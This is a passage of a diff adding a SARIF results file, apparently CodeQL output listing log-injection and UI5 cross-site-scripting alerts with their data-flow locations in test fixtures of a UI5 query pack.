: "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e197b363f9dc3962:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 34, + "endColumn" : 40 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + }, + "message" : { + "text" : "`[INFO] ... alue1}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "45280b24f3d81287:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "92dbc37bdafc7694:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "faa1832c387d2ee5:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8291f53a2e235d15:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "63ace7b071639814:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "oSearch ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 11, + "endColumn" : 48 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 27, + "startColumn" : 34, + "endColumn" : 45 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 17, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 133, + "startColumn" : 8, + "endColumn" : 27 + } + }, + "message" : { + "text" : "oControl.getTitle()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + }, + "message" : { + "text" : "\"
T ...
\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fc87b07640e9d85:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5eac262ae765:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 37 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : 